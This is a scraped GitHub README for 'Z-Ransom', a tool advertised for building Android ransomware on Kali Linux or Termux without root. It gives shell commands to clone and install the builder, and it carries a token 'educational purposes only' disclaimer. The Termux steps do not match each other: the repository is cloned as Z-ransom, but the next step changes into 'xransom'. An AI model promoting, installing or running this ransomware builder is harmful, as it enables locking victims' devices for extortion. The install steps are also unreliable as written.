caronero / Z-ransom

Z-Ransom (Create Android Ransomware In Kali linux and Termux (NO ROOT)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Z-ransom

Z-Ransom (Create Android Ransomware In Kali linux and Termux (NO ROOT)

Commands to run tool in ur terminal

Note: this tool is a copy from termuxid tool and this just edited tool you can find it in github


Note : Tool is Made of Educational Purposes only.
       Please try not to harm anyone device 
       it's For Fun Purpose Not For Revenge
       
       

Installation for linux

Quick installation for Ubuntu, Kali Linux, Darwin (MAC)

git clone https://github.com/caronero/Z-ransom.git && cd Z-ransom && sudo bash install.sh

Installation for termux

pkg update && pkg upgrade -y
pkg install python3 -y
git clone https://github.com/caronero/Z-ransom
cd xransom
bash install.sh
python3 zransom.py

And Thanks for choosing this tool Support Us !

About

Z-Ransom (Create Android Ransomware In Kali linux and Termux (NO ROOT)

License:Apache License 2.0


Languages

Language:Python 88.4%Language:Shell 11.6%